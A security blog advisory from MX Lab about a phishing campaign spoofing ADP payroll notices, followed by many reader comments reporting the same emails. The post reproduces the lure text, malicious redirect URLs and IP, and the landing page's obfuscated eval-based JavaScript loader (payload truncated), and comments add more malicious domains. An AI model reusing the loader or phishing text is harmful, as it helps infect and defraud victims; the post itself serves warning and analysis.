Emails with subject “ADP Funding Notification – Debit Draft” are a security risk


MX Lab, http://www.mxlab.eu, has intercepted some emails with the subject “ADP Funding Notification – Debit Draft” that lead to a malicious web site with obfuscated Javascript code.

The email is send from the spoofed address “ADP_FSA_Services@ADP.com” or “ADPClientServices@adp.com” and has the following body:

Your Transaction Report(s) have been uploaded to the web site:

https://www.flexdirect.adp.com/client/login.aspx

Please note that your bank account will be debited within one banking

business day for the amount(s) shown on the report(s).

Please do not respond or reply to this automated e-mail. If you have any

questions or comments, please Contact your ADP Benefits Specialist.

Thank You,

ADP Benefit Services

The URL will not lead you to the site that is mentioned but to hxxp://www.avrakougioumtzi.gr/PQB6j3HW/index.html where the following HTML code is executed:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type=”text/javascript” src=”hxxp://firmowa.malopolska.pl/WVfNMNHn/js.js”></script>
<script type=”text/javascript” src=”hxxp://humas.poltek-malang.ac.id/w28K6pb6/js.js”></script>

</html>

Both embedded Javascript URLs will redirect you document.location=’hxxp://173.255.228.171/getfile.php?u=853fda24′;

At this location, the obfuscated Javascript is present while showing in the browser “Waiting for redirect…”.

<html><body><script>try{v=prototype&5;}catch(v){x=1;}z=function(){md=”a”;if(window.document)e=”ev”;c=””;f=”fromChar”;
if(a)f=f+”Code”;
d=10;
for(i=15027-1;i>=0;i–){
w=i;
v=a[w];
k=v/((15027-i-1)%d+2);
c+=String[f](k);
}
e+=”al”;
if(x)window[e](c);}
g=””;
if(x)g+=”472.287.240.240.432.336.230.1375.590.369.384.336.288.280.176.348.198.1111.
1140.945.800.707.684.475.4″
______SHORTENED_____
if(x)g+=”07.654.585.396.333.200″;
a=g.split(“.”);
z(123);
</script></body></htm>

104 Responses to Emails with subject “ADP Funding Notification – Debit Draft” are a security risk

  1. biggie says:

    got this message today. the spooky part is they emailed me and cc’d my business partner so it took some smarts to put all that together.

  2. Billy p says:

    I received two copies.

  3. Bee says:

    thanks for the info. I received 2 emails within 30 minutes of each other. Thankfully my malware would not let me access the website.

  4. oscar says:

    Hopefully my bank account doesn’t get debited. I never signed up for adp.

  5. SE says:

    Just received this email myself. Grateful for all of the vigilant spam watchdogs out there.

    • Isobel Dick says:

      I also received this on 29/9/2012 and they also debited our business account on the 4th October 2012 and I am now trying to get them to put the money back. never signed up for this either.

      • sandy says:

        Guys please tell me will they actually debit my account, anyone there who lost money due to this silly thing? am going to run to the bank & transfer my money to another account OMG am so freaked out. We don’t have privacy in this cruel world :(

      • Judy mexted says:

        I have received this email today 13/10/12 on my iPad and it is a weekend however am freaked out as to whether they will take money from my account. I have never heard of these people. Who do I report this to?

      • Paula says:

        I received this on October 15 and they managed to take $175.00 from my checking account. I disputed it with my bank and after checking they say it is “legitimate”, but I am contesting that and requiring them to send me the documentation. This is a nightmare. I think I should change my checking account because I’m afraid it will happen again monthly every month on the 15th? Has anyone had any luck getting their bank to reverse these charges permanently. Fifth Third only reversed it for 30 days then put it back on again when they said it was “legitimate.” Bulls^*#( this was NEVER authorized by me.

  6. Denise says:

    Yes, thank you to all of you who help us daily know what is safe and what is not!!! We appreciate you.

  7. Mike says:

    I wanted to say thanks as well. I suspected it to be a phishing email, but it’s nice to be able to get such quick validation through sites like this.

  8. Don Bible says:

    This is what I love about the internet. I just got one of these and the watchdogs are already on it. Thanks

  9. Shirley Knuckey says:

    My ADP Email had the subject-line. ADP Generated Message: First Notice – Digital Certificate Expiration. I am relieved to find this support site. I still don’t know how to truly avoid these invaders as they become more and more sneaky in faking an authentic-looking address.

  10. Terry Gong says:

    Thank You
    It fell into my junk mail

  11. Pingback: New email bases threats based on obfuscated Javascript in Rabobank emails « mxlab – all about anti virus and anti spam

  12. Deborah says:

    Thank you to the watchdogs.

  13. Carla says:

    this went into our regular email as ADPClientServices, did not look right so I called ADP directly I was informed they would never send an email with another link it would be directly to their website. SO Delete, Delete, Delete!

  14. Chris says:

    Got one today. I immediately googled “ADP Funding Notification” which led me here. Kudos for the article! Cheers!

  15. amar says:

    got a similar email today @ 3.17 p.m. Searcehd internet and found this discussion. Thanks to everybody who has posted. It does help a lot in weeding out the spam emails.

  16. Britt says:

    Is there an address to forward these spam e-mails to? I get them quite frequently, from PayPal too. They have me forward the fraudulent messages to “Spoof@paypal.com”

  17. Kamala Mattie says:

    Forward them to the Frderal Trade Comission at spam@uce.gov.

  18. Gina says:

    I am glad I decided to Google who ADP was. I got this email on an infrequently used email so when it said it was going to debit my account, I was suspicious but didn’t want to click the link before checking out who the company was. Thank you posting this!

  19. Brenda says:

    I received one yesterday.

  20. gina says:

    I received one today as well, but realized it was a bogus email when I opened the “show details” and saw that it was sent to other emails that started with “gina”. googled the site and brought here. thank you.

  21. Thank you to all who posted. I received today on my business account and so did my boss

  22. Andrea says:

    I just received an email to my .mac account. Got concerned so did some research. Thank you for those who did all the research before I had to. I’m sick of these spammers. How do we stop the madness?

  23. Thanks for posting this. Just got one of these messages. Figured it was a phishing message. Googling brought me here to confirm my suspicians.

    • Arie says:

      Exactly the same here. Also googled. Thanks to you all.

    • I received one email from them today and I read your post that help me to know that it is a SPAM but I don’t know wich account could be debited if I didn’t subscribe on anything with them… Is it only if you click on their link ? Is it on a credit card account or a bank account ? Thank you !

  24. Razi says:

    I got the email today and didn’t sign up

  25. cathy says:

    I got two emails today and forwarded to spam@uce.gov

  26. Kevin K says:

    Thank you all for posting this answer. I had just recieved the same email. I kinda figured it was a phishing scam so I Googled it before opening it and was happy to see all the post. Thanks!

    Reply

  27. gillian says:

    and still it comes thought it was a scam
    thanks

  28. Matt says:

    I got it too – it was sent from A63A55B@friedbergdefense.com

    Dirty bleeding spammers!

  29. frank says:

    got it today. thanks for the info!

  30. angebala says:

    got it today. thanks for the info!

  31. David says:

    I also got one today…scary thing is I did have an ADP account through work but this email went straight to my spam box. Gonna forward it as well. Thanks for the info

  32. Autumn says:

    I got one a few minutes ago and googled the link they gave. Very glad to see this forum on it! Thanks a mil.

  33. Great says:

    I found this email today, but thanks for these coments for getting me know that, its a spam message

  34. maria says:

    Thanks! I got rid of it too!

  35. Suzee says:

    Thanks, immediate relief. You guys are great x

  36. Larry says:

    Had 2 of these spams in the past few days. One with Subject line “Debit Draft”, and the other “ADP Generated Message – Debit Draft”. Thanks for confirming my suspicions!

  37. patricia says:

    I have received many of these messages in recent days to I have not done them case; But today I get other BBB where tell me that my business has a complaint for failure to pay the ADP service.

  38. Liz says:

    I just received on with subject ADP Urgent Notification – your transaction report. The sender was: ADPClientServices D1B55477@ceccrushers.com It was caught in my SPAM filter.

  39. David says:

    I have received this email. Thankfully I googled it and found this site. Have deleted message now.
    Many thanks/
    Dave

  40. banjo bunga says:

    I just got one, its what scares me bout internet ! are our banking details really safe?

  41. Sam says:

    Don’t know who ADP are and have no reason to debit my account. I hope they actually don’t have my bank details

  42. Mariela says:

    Is my bank acct really safe??

  43. Nichola says:

    what will happen if you click on the link which I have just done?

  44. Alan says:

    I’m getting three or four a day now, all from America, I been downgraded on their business ratings and now offered diplomas How can we stop these, I’m not sure how to block E-mails and my ESP are no help

  45. LaToya says:

    Also got this message twice In my spam mail. Never signed up for this! Will keep watch on my bank account for this just to be safe!

  46. Rupesh Kumar says:

    Today I received the same message from ‘ADP Alert ‘ with the following body:

    Your Transaction Report(s) have been uploaded to the web site:

    https://www.flexdirect.adp.com/client/login.aspx

    Please note that your bank account will be debited within one banking
    business day for the amount(s) shown on the report(s).

    Please do not respond or reply to this automated e-mail. If you have any
    questions or comments, please Contact your ADP Benefits Specialist.

    Thank You,
    ADP Benefit Services

    Should I inform to bank.

  47. erkan says:

    iyi günler arkadaşlar.bana aynı mesajlardan geldi.benim banka hesabım olduğunu söylüyorlar.para çekileceğini söylüyorlar.bu nedeir.bu konuda ne dersiniz.selamlar..

  48. Lisa says:

    Scary isn’t it. It appears we dont touch it, straight up delete … single digit finger high in the air, to the swine that got our details to send. I’m glad I searched here first. I live on the same road, wondering what knowledge they have of my banking details and whether I should notify the bank. I’ll watch for someones savvy reply.

  49. Pingback: TechBuster | Get the latest news on the latest trending topics on TECHNOLOGY.

  50. Drew says:

    Yea…. got the same here … but was in my spam folder
    with this message attached:
    “Be careful with this message. Our systems couldn’t verify that this message was really sent by cparkerproperties.com. You might want to avoid clicking on links or replying with personal information. Learn more”

    so googled “https://www.flexdirect.adp.com” and came up with these notifications……

    looks like they are using various email addys to send now/……….
    r

  51. cw says:

    ADP does our payroll, and it was sent to my work email, which I don’t share anywhere but professional sites, so this was concerning. Now I wonder which company is “leaking” my contact info :(

  52. Gina says:

    They are still at it I received same today

  53. Wool says:

    I got the same e-mail.. but I clicked the link that sites on my mobile phone… is it okay? I am so nervous..:(

  54. The same here, also googled. Thanks to you all.

  55. SB says:

    I just received this email today and I’m so glad I googled it. Thank you. Immediately deleted it and added seller to spam.

  56. persille says:

    I received this today as well and have never had anything to do with ADP – I don’t even live in America. This is clearly spam/phishing attempts so it got deleted straight away, but it is rather scary how these people find and target you… Googled ADP however and it led me here, so thanks for the information. Be safe on the Internet.

  57. TML757 says:

    Yeah great work all, I poked around after getting this as well. They almost got me too because I just put in for a small business loan and I thought it had something to do with that lol always pays to look first!!

    • TML757 says:

      To all those worried about their bank accounts, from this email I would not worry. If they did already have your bank information they would not require you to click a link, they would just pretend to be some fake company and do an ACH withdraw on your account. Just be careful and google/delete any email that seem a little shady!

      • Paula says:

        I would definitely worry if I were you. I got the fake email and clicked on it because my previous employer used ADP so I thought it was legit. I’ve had $175.00 take “automatically debit” from my checking account in October. Did a “dispute” with my bank (Fifth Third) and they reversed it for 30 days while checking into it. Then they reversed it again and re-debited my account for the $175.00 because they said it was legit. I’m further disputing and asking for documentation. This is a nightmare!

  58. acetogrey says:

    I clicked on the link like an idiot, and immediately disconnected from the internet and ran my virus scan which has found nothing. I then searched the internet and found you… I should have searched first…

  59. Pingback: Heads up Spam alert, Emails with subject “ADP Funding Notification – Debit Draft” are a security risk | Englishman in Italy

  60. René Demuth says:

    I just received this email today and I’m so glad I googled it. Thank you.

  61. Corpsecrank says:

    I got this also but gmail put it directly in the span and listed it with a warning. The warning directly mentioned not clicking any links in the email lol. I wouldn’t anyhow I didn’t recognize it and if they charged the bank I could easily dispute the charges anyhow.

  62. Beena says:

    I got this mail twice today. Please can anyone tell me, will they really debit my account?? I haven’t signed up for this & have never heard of or dealt with ADP before! There’s a link also but I didn’t click on it

  63. subhash says:

    Thanks for this site , a lot of people are scammed, but because of your dedication we can stay away from this kind of nonsense.. I am usually very careful and would not open emails that do not make sense..
    KUDOS people!!!!!

  64. icon_enroht@hotmail.com says:

    I just received this e-mail….can’t they stop these scammers?

  65. millie says:

    Received this spam today. This is work email account and the only thing I have used it for lately was to post a job on Craigslist. ???????????????????
    Thanks for your help.

  66. Kez says:

    I received this email today and clicked on the link, don’t know what iwas thinking as I never open emails that I don’t trust, hope it does not take anything from my account

  67. Received a modified version this morning: 2 emails with “ADP Funding Notification” and “ADP Debit Draft” subject lines. The source and hyperlinks are different but essentially the same issue. Both display a hyperlink of “https://www.flexdirect.adp.com/client/login.aspx” but actually link to “hxxp://www.annorlimousine.com/4b2kMN/index.html” and “hxxp://daglimobilya.com/7dc5WT/index.html” respectively. I copy and paste links, I NEVER click a link in an email, especially one that is questionable. I contacted ADP and while on hold, found this blog and then they answered to confirm many have received such emails. This email originated from 109.93.41.77 (Serbia) according to the message header.

  68. Sara Cornell says:

    I’ve just got one too. I got worried not knowing who the company was and or how much was being debited from my account i clicked the link and it said ‘server’ in the top left corner so I clicked for the properties and it looked dodgy, was out ouf date and wouldn’t show certificates so I’ve glosed it and googled it and came to this site… thanks very much everyone.
    Does anyone know if im at risk because i clicked the link even though it didn’t load??

    • C says:

      I just got one if these in my junk mail. Totally confused as ADP is the name of my dentist! Clicked in link on my phone it came up forbidden. Thank god. I googled and found these comments. Thanks all for posting.

    • @SaraCornell It fell into my Gmail spam folder but I looked at it in any case. Suspicions instantly raised by the lack of addressee or signature. Quick tip – copy and paste a key phrase of many words from the email and google it (perhaps adding the word “spam” to the search argument) if you’re uncertain – such action will lead you straight to sites like this one that help. I googled the link itself(!) and got this page. Quick tip number 2 – don’t click on links. Quick tip 3 – if your malware/AV scanner didn’t block the link, run a malware scan *now* from http://www.microsoft.com/security/scanner/en-gb/default.aspx (don’t trust this link? – search for “Microsoft Safety Scanner”) and upgrade your system to an AV/malware app that does work. ATB @PedroStephano

  69. Paul Harris says:

    Well now , nice to know we are not alone when problems hit us. However at 74 I still got me marbles and can punch these sort of things into touch, whilst not using the queens english .
    Thanks to this site set up I can refer my friends to check anything that is suspicious. Many thanks Google.

  70. Verna Ellis says:

    Just got one today, too. I don’t even know who ADP is. I will be going to my bank tomorrow morning to let them know to watch out for these nuts who are trying to steal my hard-earned money. This makes me nervous and angry!!! How dare they??? I am glad I found you all through Google. What a mess!!

  71. Panos Anadiotis says:

    Thank you!!

  72. Cormac says:

    Just like many others on this page I received one of these emails today. Googled it and and found you guys. Thanks for confirming my suspicions! Great site.

  73. Linda Sine says:

    Received this today, opened, and after seeing that I was forbidden to open link, decided to search. Am I at risk? My credit unions are closed today, except for drive-thru…do I print this out and take it to them??? Do I have to worry about my tiny bank account? They’ll be pretty disappointed when they see what’s in there?? Do they want my last $10.00?? I also received an e-mail from “Wire Transfer Confirmation (FED_7811t33836)….is this related??

  74. Gianni says:

    HI, SAME TO ME , I received this one today 13 october 2012:

    FROM: ADPClientServices@adp.com

    Your Transaction Report(s) have been uploaded to the web site:

    https://www.flexdirect.adp.com/client/login.aspx

    Please note that your bank account will be debited within one banking business day for the amount(s) shown on the report(s).
    …..

    BUT INDEED THE ABOVE LINK WOULD BRING YOU TO http://kas-emlan.com/

  75. John S says:

    I received same on 12th October & left in “Junk”. Didn’t do anything with it until today. Googled & found you, so have deleted without going to link. Thanks for the info.

  76. eliza says:

    Received 2 emails on this ADP Funding Notification which I am not familiar with. I have called my bank and apparently they are aslo not sure about this ADP Funding Notification. My advice to delete and totally ignore this email.

  77. Jurgen says:

    Same here, got one yesterday and did not click on anything. First thing this morning, notified my bank to NOT actuate any transaction without my specific consent. They had never heard of this spam. Glad I found this site when I googled the ADPClient Services. Pheew!!

  78. Anne says:

    Thanks to the person/persons who set up this site and to everyone who posted about ADP e-mail. I found it in my spam folder and as in the middle of setting up a business and dealing with a lot of stuff thought a ‘proper’ message had slipped into spam folder. Stupidly (specially stupid of me as I’m an IT contractor!!) cllicked on the link and thankfully got internet can’t open this page message – phew! Googled and found this site.

  79. tas says:

    hello,

    I opened this message and tried to reply but bounced back….I am now concerned that someone may have my details is this possible?? esp if it bounced back.

    the email contained adp will be debiting my account within one working day can someone help?

  80. Wendy says:

    This is the one that I got…
    Your latest ADP Services Invoice is now available to view or pay online at ADP Online Invoice Management .

    To protect the security of your data, you will need to enter your ID and password, then click on Access your Online Invoice Management Account.

    Total amount due by October 11, 2012

    $42571.85

    If you have already sent your payment please disregard this friendly reminder and Thank you for choosing ADP.

    Questions about your bill?

    Contact your ADP administrator by Secure Mail.

    Note: This is an automated email. Please do not reply.

    They don’t have to worry about me replying…..or paying either!! Sure hope that nobody gets duped by this

  81. suej999 says:

    Just go that email–although when I hovered over the link, it went to some wholesaleshoewarehouse dot something.. I didn’t click of course!!

  82. Debbie Bentley says:

    Well..I recieved mine on Oct 12 and decided to clean my mailbox this morning before work. I, like an idiot clicked it cause I couldn’t figure out what amt they were talking about becasue I hadn’t transfered any money for about 3 weeks. The page that came up was a “page cannot be found” page. So I hope I am safe here. I’m usually not that stupid….but that’s what happens when you clean your box at 5 a.m. and forget to have coffee first. Thanks to the watchdogs Debbie Vancouver Island Canada

  83. Judy L. Holm says:

    we got one in Oct. Didn’t lose anything. There are so many bad people. Glad I found you today.

  84. Jaclyn says:

    I just got one of these on my work email. I have never signed up for this, so how do I know if my account is okay? I did not click on the link so they have no valuable information as far as I know. Should I email my bank?

Follow

Get every new post delivered to your Inbox.

Join 348 other followers

%d bloggers like this: